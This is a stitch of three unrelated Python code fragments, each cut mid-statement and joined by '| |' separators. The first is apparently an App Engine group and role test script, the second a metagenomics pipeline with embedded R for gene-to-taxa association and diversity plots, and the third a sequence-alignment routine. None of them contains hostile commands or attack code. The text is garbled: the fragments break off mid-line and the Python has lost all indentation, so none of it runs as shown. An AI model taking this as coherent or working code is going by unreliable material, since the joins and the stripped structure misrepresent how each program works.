ndb.delete_multi(list_of_keys)
entr = NeroStat.query().fetch()
list_of_keys = ndb.put_multi(entr)
ndb.delete_multi(list_of_keys)
#for i in entr:
# memcache.delete(i.key, s)
def T_in_out_group(self, message):
gp=GroupStat(name='Tparent', st_name=['lesson_remain', 'lesson_value'], role_propertys_add=[{'name':'admin' , 'change':['lesson_value','@invite', 'lesson_remain'] , 'visible': ['name']},{'name':'user' , 'change':['@name','@content'] , 'visible': ['lesson_remain', 'lesson_value']}])
self.create_group(gp)
ga=GroupStat(name='TchildA', parent_group='Tparent', st_name=['lesson_remain', 'lesson_value'], role_propertys_add=[{'name':'admin' , 'change':['lesson_value','@invite', 'lesson_remain'] , 'visible': ['name']},{'name':'user' , 'change':['@name','@content'] , 'visible': ['lesson_remain', 'lesson_value']}])
self.create_group(ga)
gb=GroupStat(name='TchildB', parent_group='Tparent', st_name=['lesson_remain', 'lesson_value'], role_propertys_add=[{'name':'admin' , 'change':['@invite'] , 'visible': ['name']},{'name':'user' , 'change':['@name','@content', 'lesson_value', 'lesson_remain'] , 'visible': ['lesson_remain', 'lesson_value']}])
self.create_group(gb)
gc=GroupStat(name='TchildC', parent_group='Tparent', st_name=[], role_propertys_add=[{'name':'ara' , 'change':['content'] , 'visible': ['name']}])
self.create_group(gc)
test_ask_put(self, gname='Tparent', observer='test_a_u@')
#print
test_ask_put(self, gname='TchildA',observer='test_a_u@', invite=True)
#time.sleep(3)
test_ask_put(self, gname='TchildB',observer='test_a_u@')
#time.sleep(3)
test_ask_put(self, gname='TchildC',observer='test_a_u@')
test_ask_put(self, gname='TchildA',observer='test_a_u@', invite=True)
def card_test_prepare(self, message):
ga=GroupStat(name='A', st_name=['u_f', 'a_f', 'lesson_in'], role_propertys_add=[{'name':'admin' , 'change':['a_f','@invite'] , 'visible': ['u_f', 'a_f']}])
self.create_group(ga)
self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='A', role='admin'))
self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='A', role='user'))
print "++create group + 2 users nomad & ff"
#gupd = GroupStat(name='A', st_name=['card'], st_opt=['+@u_f'], role_propertys_add=[{'name':'admin', 'change':['card'], 'visible': []}])
#self.update_group(gupd)
self.use_card(CardId(card_id='123', child_object='<EMAIL>', stat_pls='u_f'))
self.use_card(CardId(card_id='123', stat_pls='u_f'))
def T_fill_attr(self):
self.start(Answer())
ga=GroupStat(name='A', st_name=['name', 'name', 'lesson_in', 'lesson_in', 'jump'], st_opt=['0','like','nero',"ranking","ranking"], st_ifbase=[True, True, False,False,False], st_place=[0], role_propertys_add=[{'name':'admin' , 'change':['name', 'lesson_in', 'jump', '@invite'], 'visible': []}, {'name':'user' , 'change':['lesson_in','jump'] , 'visible': []}])
self.create_group(ga)
self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='A', group_creator='<EMAIL>', role='admin'))
#self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='A', group_creator='<EMAIL>', role='user'))
#self.put_object_to_group(PutObjectTo(child_object='1@', group_name='A', role='user', kind='user'))
print "TEST CREATE GROUP COPY TMP"
gb=CopyGroup(old_name='A', old_author='<EMAIL>', new_name='b')
self.copy_template(gb)
print "TEST PUT USER AND GROUP"
#self.put_object_to_group(PutObjectTo(child_object='b', group_name='A', kind='group'))
#self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='b', role='admin', kind='user'))
#-self.create_group(gb)
#-self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='B', role='admin', kind='user'))
gp=GroupStat(name='U', st_name=['hw', 'lesson_in2', 'name'], st_opt=['photo',"nero",'0'], st_ifbase=[False,False,True], role_propertys_add=[{'name':'admin' , 'change':[], 'visible': []}])
self.create_group(gp)
self.put_object_to_group(PutObjectTo(child_object='U', child_gr_author='<EMAIL>', group_name='A', group_creator='<EMAIL>'))
T_show_user(self, Answer(), u='ahFkZXZ-dW5pdmVyc2l0eWdpbXIaCxIEQmFzZSIQZmZic2t0QGdtYWlsLmNvbQw', s='<EMAIL>')
def T_Nero(self):
print '--T Edit Nero stat'
u1 = User(mail='<EMAIL>', return_ch=[0,], st_def=['23',], st_name=['lesson_in',], st_opt=['nero',])
self.edit_user(u1)
u1.mail = '1@'
self.edit_user(u1)
entity = ndb.Key(Base, '1@').get()
self.fill_attr({'st_name':['lesson_in',], 'value':['203',], 'opt':['nero',]}, entity, upgrade=True, group_name=1, auth_mail='<EMAIL>')
entity.put()
#param={'name':'Bskt', 'st_name':['name', 'level'], 'st_opt':['0', 'ranking'], 'st_place':[2], 'st_w':[1.0], 'st_ifbase':[True,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name','level']}]}, mescls=GroupStat, f='create_group')
def T_Normativ(self):
#self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Basketball', group_creator='<EMAIL>', role='referi'))
#self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='General parametrs', group_creator='<EMAIL>', role='user'))
#self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Basketball', group_creator='<EMAIL>', role='user'))
param_add_stat={'name':'Basketball', 'st_name':['normativ'], 'st_opt':['ranking'], 'st_place':[1], 'st_w':[1.0], 'st_ifbase':[False], 'role_propertys_add':[{'name':'referi', 'change':['normativ'], 'visible':[]},{'name':'admin', 'change':['normativ'], 'visible':[]},{'name':'user', 'change':[], 'visible':['normativ']} ]}
#T_f(self, param=param_add_stat, mescls=GroupStat, f='create_group')
#T_f(self, param={'creator_mail':'<EMAIL>','name':'Basketball'}, mescls=GroupStat, f='update_group')
T_f(self, param={'group_url':BASKETBALL_GROUP_URL}, mescls=Show, f='compute_top')
def tl(self):
line = '<EMAIL>, 22557695, <EMAIL>, 19650399, <EMAIL>, 19149119, <EMAIL>, 16943455, <EMAIL>, 16843263, <EMAIL>, 15840495, <EMAIL>, 15238975, <EMAIL>, 14938148, <EMAIL>, 14336612, me.scribe.<EMAIL>, 11930623, <EMAIL>, 11028383, <EMAIL>, 10827839, <EMAIL>, 7719716, <EMAIL>, 7018047, <EMAIL>, 7018047, <EMAIL>, 7017983, <EMAIL>, 5113183, <EMAIL>, 4411519, <EMAIL>, 4411455, <EMAIL>, 3709727, <EMAIL>, 3208415, <EMAIL>, 3208319, <EMAIL>, 1804687, <EMAIL>, 701807, <EMAIL>, 401215, <EMAIL>, 401151'
print line.split(', ')
arr = line.split(', ')
ml = ''
for i, d in enumerate(arr):
print '@', i, d, i%2
if not i%2:
self.put_object_to_group(PutObjectTo(child_object=d, | |
ifelse(anno$status == "down.both", "darkGreen", sidecols)''')
R('''sidecols <- ifelse(anno$status == "down.DNA", "blue", sidecols)''')
R('''sidecols <- ifelse(anno$status == "up.DNA", "orange", sidecols)''')
# scale data
R('''dat.s <- data.frame(t(apply(dat,1,scale)))''')
R('''dat.s <- dat.s[rownames(anno),]''')
R('''colnames(dat.s) <- colnames(dat)''')
# just get steady state and colitis
# R('''print(dim(dat.s))''')
R('''dat.s <- dat.s[,c(9:16, 25:32)]''')
R('''png("%s")''' % outfile)
R('''heatmap.2(as.matrix(dat.s),
trace = "none",
Colv = F,
Rowv = T,
col = colors,
distfun = distfun,
hclustfun = hclustfun,
margins = c(15,15),
RowSideColors = sidecols)''')
R["dev.off"]()
#########################################
#########################################
#########################################
# associate genes with taxonomic
# assignments
#########################################
#########################################
#########################################
@transform(annotateRNADNARatio, suffix(".tsv"), ".list")
def buildGeneListForTaxaAssociations(infile, outfile):
'''
build a list of COGs for use with annotating to
taxa
'''
statement = '''cat %(infile)s | cut -f1 | tail -n+2 > %(outfile)s'''
P.run()
#########################################
#########################################
#########################################
@follows(mkdir("associate_taxa.dir"), buildGeneListForTaxaAssociations)
@transform(glob.glob(os.path.join(PARAMS.get("rna_communitiesdir"), "genes.dir/*.genes.tsv.gz")),
regex("(\S+)/(\S+).genes.tsv.gz"),
add_inputs(glob.glob(os.path.join(PARAMS.get("rna_communitiesdir"), "diamond.dir/*.diamond.lca.gz"))),
r"associate_taxa.dir/\2.ctaxa.tsv.gz")
def buildCountTaxaInCogsRNA(infiles, outfile):
'''
reads that map to differentially expressed genes are cross-referenced
with their genera assignment - provides per taxa counts
'''
job_options="-l mem_free=20G"
m = PARAMS.get("genes_map")
alignment_genes = infiles[0]
track = P.snip(os.path.basename(alignment_genes), ".diamond.genes.tsv.gz")
alignment_taxa = [x for x in infiles[1] if os.path.basename(x).startswith(track)][0]
statement = '''python %(projscripts)s/diff2genera.py
-m %(m)s
-d rna_dna_ratio.dir/ratio_genes.annotated.list
--alignment-taxa=%(alignment_taxa)s
--alignment-genes=%(alignment_genes)s
--counts
--log=%(outfile)s.log
| gzip > %(outfile)s'''
P.run()
#########################################
#########################################
#########################################
@merge(buildCountTaxaInCogsRNA, "associate_taxa.dir/associated_taxa_counts.tsv.gz")
def mergeCountTaxaInCogsRNA(infiles, outfile):
'''
merge tables of taxa associated with genes
'''
pattern = os.path.dirname(infiles[0]) + "/*.ctaxa.tsv.gz"
prefixes = ",".join([P.snip(os.path.basename(x), ".diamond.ctaxa.tsv.gz") for x in glob.glob(pattern)])
statement = '''python %(scriptsdir)s/combine_tables.py
--glob=%(pattern)s
--missing=0
--prefixes=%(prefixes)s
--columns=1,2
--log=%(outfile)s.log
| gzip > %(outfile)s'''
P.run()
#########################################
#########################################
#########################################
@follows(mkdir("cog_diversity.dir"))
@transform(buildCountTaxaInCogsRNA,
regex("(\S+)/(\S+).tsv.gz"),
r"cog_diversity.dir/\2.diversity.tsv")
def buildCogDiversity(infile, outfile):
'''
for each COG, estimate species richness in terms
of expression
'''
R('''library("vegan")''')
R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infile)
R('''dat <- dat[grep("unassigned", dat$taxa, invert = T),]''')
R('''cogs <- unique(dat$cog)''')
R('''chao.ests <- c()''')
R('''evennesses <- c()''')
R('''for (cog in cogs){
dat2 <- dat[dat$cog == cog,]
res <- data.frame(estimateR(dat2[,3]))
chao1.est <- res["S.chao1",]
chao.ests <- append(chao.ests, chao1.est)
diversity.est <- diversity(dat2[,3])
nspecies <- specnumber(dat2[,3])
evenness <- diversity.est/log(nspecies)
evennesses <- append(evennesses, evenness)
}''')
R('''result <- data.frame("gene" = cogs, "chao1" = chao.ests, "evenness" = evennesses)''')
R('''write.table(result, file = "%s", quote = F, sep = "\t", row.names = F)''' % outfile)
#########################################
#########################################
#########################################
@merge(buildCogDiversity, "cog_diversity.dir/cog_transcriptional_diversity.tsv.gz")
def mergeCogDiversity(infiles, outfile):
'''
merge chao1 diversity estimates
per COG
'''
pattern = os.path.dirname(infiles[0]) + "/*.diversity.tsv"
prefixes = ",".join([P.snip(os.path.basename(x), ".diversity.tsv") for x in glob.glob(pattern)])
statement = '''python %(scriptsdir)s/combine_tables.py
--glob=%(pattern)s
--missing=0
--prefixes=%(prefixes)s
--columns=1
--take=2,3
--log=%(outfile)s.log
| gzip > %(outfile)s'''
P.run()
#########################################
#########################################
#########################################
@merge([mergeCogDiversity, buildGenesOutsidePredictionInterval],
"cog_diversity.dir/cog_transcriptional_diversity_annotated.tsv")
def mergeCogDiversityWithAnnotations(infiles, outfile):
'''
merge cog diversity estimates with COG
differential abundance status
'''
diversity = pandas.read_table(
infiles[0],
compression = "gzip"
)
d2 = diversity.filter(like = "chao1", axis = 1)
d3 = diversity.filter(like = "evenness", axis = 1)
diversity["average_richness"] = pandas.Series(d2.mean(axis = 1))
diversity["average_evenness"] = pandas.Series(d3.mean(axis = 1))
annotations = pandas.read_table(infiles[1])
dat = pandas.merge(diversity, annotations)
dat.to_csv(outfile, sep = "\t")
#########################################
#########################################
#########################################
@transform(mergeCogDiversityWithAnnotations,
suffix("_diversity_annotated.tsv"),
"_richness.pdf")
def plotCogRichnessDistributions(infile, outfile):
'''
plot the distribution of max(average) values
per cluster
'''
R('''library(gplots)''')
R('''library(gtools)''')
R('''library(ggplot2)''')
R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t", row.names = 1)''' % infile)
R('''dat$pi_status <- ifelse(dat$status == "NS", "NS", dat$pi_status)''')
R('''dat$pi_status[dat$pi_status == ""] <- "other_significant"''')
#R('''dat$pi_status <- ifelse(dat$pi_status == "", dat$status, dat$pi_status)''')
# # ks test
# for x, y in itertools.product([1,2,3,4,5],[1,2,3,4,5]):
# outf = "associate_taxa.dir/cluster-%i_cluster-%i.sig" % (x,y)
# R('''k <- ks.test(averages$mean[averages$class == %i],averages$mean[averages$class == %i])''' % (x,y))
# R('''k <- data.frame("D" = k[[1]], "p-value" = k[[2]])''')
# R('''write.table(k, file = "%s", sep = "\t")''' % outf)
R('''plot1 <- ggplot(dat, aes(x = average_richness, colour = factor(pi_status))) + stat_ecdf(size = 1.2)''')
R('''plot1 + scale_colour_manual(values = c("cyan3", "darkorchid", "black", "darkgoldenrod2", "grey", "darkBlue"))''')
#stat_ecdf(size = 0.3)''')
# R('''plot1 + scale_colour_manual(values = c("orange", "purple", "red", "brown", "darkGreen"))''')
R('''ggsave("%s")''' % outfile)
#########################################
#########################################
#########################################
@transform(mergeCogDiversityWithAnnotations,
suffix("_diversity_annotated.tsv"),
"_evenness.pdf")
def plotCogEvennessDistributions(infile, outfile):
'''
plot the distribution of max(average) values
per cluster
'''
R('''library(gplots)''')
R('''library(gtools)''')
R('''library(ggplot2)''')
R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t", row.names = 1)''' % infile)
R('''dat$pi_status <- ifelse(dat$status == "NS", "NS", dat$pi_status)''')
R('''dat$pi_status[dat$pi_status == ""] <- "other_significant"''')
R('''dat <- na.omit(dat)''')
R('''print(unique(dat$pi_status))''')
# R('''dat$pi_status <- ifelse(dat$status == "NS", "NS", dat$pi_status)''')
# R('''dat$pi_status <- ifelse(dat$pi_status == "", dat$status, dat$pi_status)''')
# # ks test
# for x, y in itertools.product([1,2,3,4,5],[1,2,3,4,5]):
# outf = "associate_taxa.dir/cluster-%i_cluster-%i.sig" % (x,y)
# R('''k <- ks.test(averages$mean[averages$class == %i],averages$mean[averages$class == %i])''' % (x,y))
# R('''k <- data.frame("D" = k[[1]], "p-value" = k[[2]])''')
# R('''write.table(k, file = "%s", sep = "\t")''' % outf)
R('''plot1 <- ggplot(dat, aes(x = average_evenness, colour = factor(pi_status))) + stat_ecdf(size = 1.2)''')
R('''plot1 + scale_colour_manual(values = c("cyan3", "darkorchid", "black", "darkgoldenrod2", "grey", "darkBlue"))''')
# R('''plot1 + scale_colour_manual(values = c("orange", "purple", "red", "brown", "darkGreen"))''')
R('''ggsave("%s")''' % outfile)
#########################################
#########################################
#########################################
@follows(mkdir("associate_taxa.dir"), buildGeneListForTaxaAssociations)
@transform(glob.glob(os.path.join(PARAMS.get("rna_communitiesdir"), "genes.dir/*.genes.tsv.gz")),
regex("(\S+)/(\S+).genes.tsv.gz"),
add_inputs(glob.glob(os.path.join(PARAMS.get("rna_communitiesdir"), "diamond.dir/*.diamond.lca.gz"))),
r"associate_taxa.dir/\2.ptaxa.tsv.gz")
def buildProportionTaxaInCogsRNA(infiles, outfile):
'''
reads that map to differentially expressed genes are cross-referenced
with their genera assignment
'''
job_options="-l mem_free=25G"
m = PARAMS.get("genes_map")
alignment_genes = infiles[0]
track = P.snip(os.path.basename(alignment_genes), ".diamond.genes.tsv.gz")
alignment_taxa = [x for x in infiles[1] if os.path.basename(x).startswith(track)][0]
statement = '''python %(projscripts)s/diff2genera.py
-m %(m)s
-d rna_dna_ratio.dir/ratio_genes.annotated.list
--alignment-taxa=%(alignment_taxa)s
--alignment-genes=%(alignment_genes)s
--level=genus
--log=%(outfile)s.log
| gzip > %(outfile)s'''
P.run()
#########################################
#########################################
#########################################
@merge(buildProportionTaxaInCogsRNA, "associate_taxa.dir/associated_ptaxa.tsv.gz")
def mergeProportionTaxaInCogsRNA(infiles, outfile):
'''
merge tables of taxa associated with genes
'''
temp = P.getTempFilename(".")
pattern = os.path.dirname(infiles[0]) + "/*.ptaxa.tsv.gz"
prefixes = ",".join([P.snip(os.path.basename(x), ".diamond.ptaxa.tsv.gz") for x in glob.glob(pattern)])
statement = '''python %(scriptsdir)s/combine_tables.py
--glob=%(pattern)s
--missing=0
--prefixes=%(prefixes)s
--columns=1,2
--log=%(outfile)s.log
> %(temp)s'''
P.run()
inf = IOTools.openFile(temp)
header = inf.readline()[:-1].split("\t")
header = header[0].split("-") + header[1:]
outf = IOTools.openFile(outfile, "w")
outf.write("\t".join(header) + "\n")
for line in inf.readlines():
data = line[:-1].split("\t")
cog_taxa = data[0].split("-")
new_data = cog_taxa + data[1:]
outf.write("\t".join(new_data) + "\n")
outf.close()
os.unlink(temp)
#########################################
#########################################
#########################################
@transform(mergeProportionTaxaInCogsRNA,
suffix(".tsv.gz"),
".average_ptaxa.matrix")
def buildTaxaCogCountsMatrix(infile, outfile):
'''
build cog x taxa matrix
'''
inf = IOTools.openFile(infile)
header = inf.readline()
result = {}
# create container for results
for line in inf.readlines():
data = line[:-1].split("\t")
cog, taxa = data[0], data[1]
if taxa == "unassigned": continue
result[cog] = {}
# get average % taxa per cog
inf = IOTools.openFile(infile)
header = inf.readline()
for line in inf.readlines():
data = line[:-1].split("\t")
if len(data) == 19:
cog, taxa = data[0], data[1]
values = map(float,data[3:])
elif len(data) == 20:
cog, taxa = data[0], data[1]
values = map(float,data[4:])
else:
cog, taxa = data[0], data[1]
values = map(float,data[2:])
if taxa == "unassigned": continue
ave = np.mean(values)
try:
result[cog][taxa] = ave
except KeyError: continue
df = pandas.DataFrame(result)
df.to_csv(outfile, sep = "\t", na_rep = 0)
###################################################
###################################################
###################################################
@merge([buildTaxaCogCountsMatrix, buildGenesOutsidePredictionInterval],
"associate_taxa.dir/taxa_cogs_matrix_annotated.pdf")
def plotMaxTaxaContribution(infiles, outfile):
'''
plot the distribution of maximum genus
contribution per gene set
'''
R('''library(ggplot2)''')
R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infiles[0])
R('''annotations <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infiles[1])
R('''maximums <- apply(dat, 2, max)''')
R('''dat2 <- data.frame("cog" = colnames(dat), "max" = maximums)''')
R('''dat3 <- merge(dat2, annotations, by.x = "cog", by.y = "gene")''')
R('''dat3$pi_status <- ifelse(dat3$status == "NS", "NS", dat3$pi_status)''')
R('''dat3$pi_status[is.na(dat3$pi_status)] <- "other_significant"''')
R('''plot1 <- ggplot(dat3, aes(x = as.numeric(as.character(max)), group = pi_status, colour = pi_status)) + stat_ecdf(size = 1.1)''')
R('''plot1 + scale_colour_manual(values = c("cyan3", "darkorchid", "black", "darkgoldenrod2", "grey", "darkBlue"))''')
R('''ggsave("%s")''' % outfile)
###################################################
###################################################
###################################################
@merge([buildTaxaCogCountsMatrix, buildGenesOutsidePredictionInterval],
"associate_taxa.dir/taxa_cogs_matrix_annotated.sig")
def testSignificanceOfMaxTaxaContribution(infiles, outfile):
'''
plot the distribution of maximum genus
contribution per gene set
'''
R('''library(ggplot2)''')
R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infiles[0])
R('''annotations <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t")''' % infiles[1])
R('''maximums <- apply(dat, 2, max)''')
R('''dat2 <- data.frame("cog" = colnames(dat), "max" = maximums)''')
R('''dat3 <- merge(dat2, annotations, by.x = "cog", by.y = "gene")''')
R('''dat3$pi_status <- ifelse(dat3$status == "NS", "NS", dat3$pi_status)''')
R('''diff.up.rna <- as.numeric(as.character(dat3$max[dat3$pi_status == "diff.up.rna"]))''')
R('''diff.down.rna <- as.numeric(as.character(dat3$max[dat3$pi_status == "diff.down.rna"]))''')
R('''diff.up.dna <- as.numeric(as.character(dat3$max[dat3$pi_status == "diff.up.dna"]))''')
R('''diff.down.dna <- as.numeric(as.character(dat3$max[dat3$pi_status == "diff.down.dna"]))''')
R('''ns <- as.numeric(as.character(dat3$max[dat3$pi_status == "NS"]))''')
# ks tests
R('''ks1 <- ks.test(diff.up.rna, ns)''')
R('''ks2 <- ks.test(diff.down.rna, ns)''')
R('''ks3 <- ks.test(diff.up.dna, ns)''')
R('''ks4 <- ks.test(diff.down.dna, ns)''')
R('''res <- data.frame("RNAGreaterThanDNA.up.pvalue" = ks1$p.value,
"RNAGreaterThanDNA.up.D" = ks1$statistic,
"RNAGreaterThanDNA.down.pvalue" = ks2$p.value,
"RNAGreaterThanDNA.down.D" = ks2$statistic,
"DNAGreaterThanRNA.up.pvalue" = ks3$p.value,
"DNAGreaterThanRNA.up.D" = ks3$statistic,
"DNAGreaterThanRNA.down.pvalue" = ks4$p.value,
"DNAGreaterThanRNA.down.D" = ks4$statistic)''')
R('''write.table(res, file = "%s", sep = "\t", quote = F, row.names = F)''' % outfile)
#########################################
#########################################
#########################################
@transform(buildTaxaCogCountsMatrix,
suffix(".matrix"),
add_inputs(buildGenesOutsidePredictionInterval),
".pdf")
def heatmapTaxaCogProportionMatrix(infiles, outfile):
'''
plot the taxa associated with each cog on
a heatmap
'''
R('''library(gplots)''')
R('''library(gtools)''')
R('''dat <- read.csv("%s", header = T, stringsAsFactors = F, sep = "\t", row.names = 1)''' | |
""
for n in range(w_firstp.shape[1]-2*seq_slide):
w_firstp[-1, s + n] = seq_matrix_w1[z, n]
w_firstp_info = seq_info_sharper(seq_freq(w_firstp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
if w_firstp_info>w_firstp_info_max:
wbest_firstp = np.zeros(w_firstp.shape)
wbest_firstp = w_firstp
w_firstp_info_max = w_firstp_info
endtime_time = time.clock()
print("0th Pass Done. ", int(endtime_time-start_time), " seconds elapsed")
#Remaining passes will shuffle individual sequences in preceeding passes
w_nextp = np.zeros([wbest_firstp.shape[0]-5, wbest_firstp.shape[1]], dtype='str')
for x in range(w_nextp.shape[0]):
for y in range(w_nextp.shape[1]):
w_nextp[x, y] = wbest_firstp[x+5, y]
print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
print("Starting information content is: ", print_info)
wnextp_info_1 = seq_info_sharper(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
wnextp_info_2 = wnextp_info_1 #Initialize variable
pass_counter = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
while True:
wnextp_info_1 = wnextp_info_2 #Set old value to 'new' value from previous pass
pass_counter += 1
for line in range(w_nextp.shape[0]):
line_info = 0
line_info_max = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
for s in range(2*seq_slide+1):
for y in range(w_nextp.shape[1]):
w_nextp[line, y] = ""
for y in range(seq_matrix_w1.shape[1]):
w_nextp[line, s + y] = seq_matrix_w1[line, y]
line_info = seq_info_sharp(seq_freq(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
if line_info>line_info_max:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
if line_info==line_info_max and random.randint(0,1)==1:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
w_nextp = w_nextp_best
wnextp_info_2 = seq_info_sharper(seq_freq_orig(w_nextp_best[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
print_info = seq_info(seq_freq_orig(w_nextp_best[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
endtime_time = time.clock()
print("Pass # ", int(pass_counter), " information content is: ", print_info, ". ", int(endtime_time-start_time), " seconds elapsed")
if wnextp_info_2<wnextp_info_1*improvement_thresh and wnextp_info_2>wnextp_info_1:
break
print("Sequence improvement threshold reached. Malign: SharpER is stopping.")
return(w_nextp_best)
def malign(seq_matrix, seq_slide, seq_start, seq_stop, improvement_thresh, left_gap, seq_length):
print("Malign")
start_time = time.clock()
seq_matrix_w1 = seq_matrix[:,seq_start:seq_stop]
seq_matrix_w2_size = [seq_matrix_w1.shape[0], seq_matrix_w1.shape[1]+2*seq_slide]
seq_matrix_w2 = np.zeros(seq_matrix_w2_size, dtype='str')
#Transferring sequences from seq.matrix.w1 to the middle of seq.matrix.w2
for x in range(0, int(seq_matrix_w1.shape[0])):
for y in range(0, int(seq_matrix_w1.shape[1])):
seq_matrix_w2[x, y+seq_slide] = seq_matrix_w1[x,y]
print(seq_matrix.shape[0], " sequences")
#Heuristic start: pick five random sequences
mat_heur = np.zeros([5, int(seq_matrix_w2_size[1])], dtype='str')
for rowNum in range(mat_heur.shape[0]):
randRowNum = random.randint(0, seq_matrix_w2.shape[1])
mat_heur[rowNum,:]=seq_matrix_w2[randRowNum,:]
#Heuristic start: brute force through all cases
w_heur = np.zeros(mat_heur.shape, dtype='str')
w_heur_best = np.zeros(mat_heur.shape, dtype='str')
w_info_max = 0
w_info_current = 0
for s0 in range(2*seq_slide+1):
for s1 in range(2*seq_slide+1):
for s2 in range(2*seq_slide+1):
for s3 in range(2*seq_slide+1):
for s4 in range(2*seq_slide+1):
for y in range(w_heur.shape[1]-2*seq_slide):
w_heur[0, s0 + y] = mat_heur[0, y + seq_slide]
w_heur[1, s1 + y] = mat_heur[1, y + seq_slide]
w_heur[2, s2 + y] = mat_heur[2, y + seq_slide]
w_heur[3, s3 + y] = mat_heur[3, y + seq_slide]
w_heur[4, s4 + y] = mat_heur[4, y + seq_slide]
w_info_current = seq_info(seq_freq(w_heur[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
if w_info_current>w_info_max: #Pick each better alignment found
w_info_max = w_info_current
w_heur_best = w_heur
if w_info_current==w_info_max and random.randint(0,1)==1:#randomly pick between two equal alignments found
w_info_max = w_info_current
w_heur_best = w_heur
w_heur = np.zeros(mat_heur.shape, dtype='str')
#Heuristic start done! w_heur now contains the best consensus found from 5 random sequences
endtime_time = time.clock()
print ("Heuristic start done. ", int(endtime_time-start_time), " seconds elapsed.")
#First pass will append individual sequences to the heuristic consensus above and optimize
w_firstp = np.zeros([w_heur_best.shape[0]+1, w_heur_best.shape[1]], dtype='str')
for x in range(w_heur_best.shape[0]):
for y in range(w_heur_best.shape[1]):
w_firstp[x, y] = w_heur_best[x, y]
w_firstp_info = 0
w_firstp_info_max = 0
wbest_firstp = np.zeros(w_firstp.shape, dtype='str')
for s in range(2*seq_slide+1):
w_firstp = np.zeros([w_heur_best.shape[0]+1, w_heur_best.shape[1]], dtype='str') #For some reason I have to reinitialize the matrix, and cannot say w_firstp[-1,:] = "". Check with Sumeet
for x in range(w_heur_best.shape[0]):
for y in range(w_heur_best.shape[1]):
w_firstp[x, y] = w_heur_best[x, y]
for y in range(w_firstp.shape[1]-2*seq_slide):
w_firstp[-1, s + y] = seq_matrix_w2[0, y + seq_slide]
w_firstp_info = seq_info(seq_freq(w_firstp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
if w_firstp_info>w_firstp_info_max:
wbest_firstp = w_firstp
w_firstp_info_max = w_firstp_info
w_firstp = np.zeros([wbest_firstp.shape[0]+1, wbest_firstp.shape[1]], dtype='str')
for x in range(wbest_firstp.shape[0]):
for y in range(wbest_firstp.shape[1]):
w_firstp[x, y] = wbest_firstp[x, y]
for z in range(1,seq_matrix_w2.shape[0]):
w_firstp_info_max = 0
w_firstp = np.zeros([wbest_firstp.shape[0]+1, wbest_firstp.shape[1]], dtype='str')
for s in range(2*seq_slide+1):
w_firstp = np.zeros([w_firstp.shape[0], w_firstp.shape[1]], dtype='str')
for x in range(wbest_firstp.shape[0]):
for y in range(wbest_firstp.shape[1]):
w_firstp[x, y] = wbest_firstp[x, y]
for n in range(w_firstp.shape[1]):
w_firstp[-1, n] = ""
for n in range(w_firstp.shape[1]-2*seq_slide):
w_firstp[-1, s + n] = seq_matrix_w1[z, n]
w_firstp_info = seq_info(seq_freq(w_firstp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
if w_firstp_info>w_firstp_info_max:
wbest_firstp = np.zeros(w_firstp.shape)
wbest_firstp = w_firstp
w_firstp_info_max = w_firstp_info
endtime_time = time.clock()
print("0th Pass Done. ", int(endtime_time-start_time), " seconds elapsed")
#Remaining passes will shuffle individual sequences in preceeding passes
w_nextp = np.zeros([wbest_firstp.shape[0]-5, wbest_firstp.shape[1]], dtype='str')
for x in range(w_nextp.shape[0]):
for y in range(w_nextp.shape[1]):
w_nextp[x, y] = wbest_firstp[x+5, y]
print_info = seq_info(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length]))
print("Starting information content is: ", print_info)
wnextp_info_1 = seq_info(seq_freq_orig(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
wnextp_info_2 = wnextp_info_1 #Initialize variable
pass_counter = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
while True:
wnextp_info_1 = wnextp_info_2 #Set old value to 'new' value from previous pass
pass_counter += 1
for line in range(w_nextp.shape[0]):
line_info = 0
line_info_max = 0
w_nextp_best = np.zeros(w_nextp.shape, dtype='str')
for s in range(2*seq_slide+1):
for y in range(w_nextp.shape[1]):
w_nextp[line, y] = ""
for y in range(seq_matrix_w1.shape[1]):
w_nextp[line, s + y] = seq_matrix_w1[line, y]
line_info = seq_info(seq_freq(w_nextp[:, seq_slide+left_gap:seq_slide+left_gap+seq_length])) ###
if line_info>line_info_max:
line_info_max = line_info
for v1 in range(w_nextp_best.shape[0]):
for v2 in range(w_nextp_best.shape[1]):
w_nextp_best[v1, v2] = w_nextp[v1, v2]
if line_info==line_info_max and random.randint(0,1)==1:
